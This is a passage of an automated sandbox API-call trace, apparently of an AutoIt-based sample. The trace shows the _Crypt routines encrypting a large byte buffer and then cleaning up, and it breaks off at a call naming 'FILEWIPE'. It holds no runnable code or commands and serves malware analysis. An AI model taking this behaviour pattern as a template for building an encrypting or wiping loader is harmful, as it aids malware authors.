dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0197.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.001] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0197.001] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.001] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.001] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.001] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0197.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.001] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.002] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.002] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.002] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.002] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.002] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.002] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.002] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.002] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.002] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.002] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0197.002] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.003] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x102c9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x102d0) returned 1 [0197.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.003] CharLowerBuffW (in: lpsz="byte[66257]", cchLength=0xb | out: lpsz="byte[66257]") returned 0xb [0197.003] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.004] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.004] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6f2e0*, pdwDataLen=0x87e820*=0x102c9, dwBufLen=0x102d0 | out: pbData=0xa6f2e0*, pdwDataLen=0x87e820*=0x102d0) returned 1 [0197.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.004] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.005] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.005] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.005] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.005] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.005] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.005] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0197.005] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.005] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.005] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.005] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.005] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0197.006] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.014] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.014] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0197.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.014] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.014] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.014] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0197.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.014] CryptDestroyKey (hKey=0x90af18) returned 1 [0197.014] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.015] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.015] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.015] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.015] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.015] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.015] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0197.015] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.015] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.015] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0197.015] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0197.015] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.016] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.016] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.016] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.016] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.016] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.016] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.016] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.016] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.017] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.017] FreeLibrary (hLibModule=0x74f20000) returned 1 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.017] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.017] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.019] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.019] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: 